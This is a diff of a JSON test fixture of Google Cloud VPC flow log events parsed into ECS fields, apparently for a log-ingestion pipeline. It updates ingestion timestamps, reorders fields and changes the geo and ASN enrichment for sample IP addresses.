@@ -9870,7 +10347,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391696900Z", + "ingested": "2021-12-14T14:43:27.415224246Z", "original": "{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", 
@@ -9881,43 +10358,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65315, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 118762, - "packets": 615, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", - "bytes": 118762, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 615, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -9928,6 +10368,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -9948,8 +10391,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65315, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 118762, + "packets": 615, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391701100Z", + "ingested": "2021-12-14T14:43:27.415224640Z", "original": "{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", 
@@ -9957,6 +10425,18 @@ "id": "y4wffpfk2ero6", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", + "bytes": 118762, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 615, + "direction": "outbound" } }, { @@ -9965,11 +10445,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -10047,7 +10532,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391705500Z", + "ingested": "2021-12-14T14:43:27.415225033Z", "original": "{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", 
@@ -10058,41 +10543,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 57300, - "bytes": 1458, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10103,6 +10553,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -10123,8 +10576,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 57300, + "bytes": 1458, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391710600Z", + "ingested": "2021-12-14T14:43:27.415225423Z", "original": "{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", 
@@ -10132,44 +10610,21 @@ "id": "y4wffpfk2eroy", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 54662, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", - "bytes": 1776, + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", + "bytes": 1458, "transport": "tcp", "type": "ipv4", "iana_number": "6", "packets": 7, - "direction": "outbound" - }, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10180,6 +10635,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -10200,8 +10658,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 54662, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391715300Z", + "ingested": "2021-12-14T14:43:27.415225929Z", "original": "{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", 
@@ -10209,10 +10692,22 @@ "id": "y4wffpfk2erof", "category": "network", "type": "connection" - } - }, - { - "log": { + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" + } + }, + { + "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { @@ -10223,11 +10718,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33572, 
@@ -10299,7 +10799,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391719Z", + "ingested": "2021-12-14T14:43:27.415226429Z", "original": "{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", @@ -10321,11 +10821,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33540, 
@@ -10397,7 +10902,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391723500Z", + "ingested": "2021-12-14T14:43:27.415227668Z", "original": "{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", @@ -10413,11 +10918,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -10495,7 +11005,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391727600Z", + "ingested": "2021-12-14T14:43:27.415228202Z", "original": "{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", 
@@ -10506,41 +11016,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 54662, - "bytes": 1464, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", - "bytes": 1464, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10551,6 +11026,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -10571,8 +11049,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 54662, + "bytes": 1464, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391731300Z", + "ingested": "2021-12-14T14:43:27.415228764Z", "original": "{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", 
@@ -10580,6 +11083,18 @@ "id": "y4wffpfk2eroj", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", + "bytes": 1464, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -10588,11 +11103,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -10670,7 +11190,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391735300Z", + "ingested": "2021-12-14T14:43:27.415229306Z", "original": "{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", @@ -10692,11 +11212,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33536, 
@@ -10768,7 +11293,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391738600Z", + "ingested": "2021-12-14T14:43:27.415229792Z", "original": "{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", @@ -10790,11 +11315,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -10866,7 +11396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391743Z", + "ingested": "2021-12-14T14:43:27.415230256Z", "original": "{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", @@ -10882,11 +11412,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33540, 
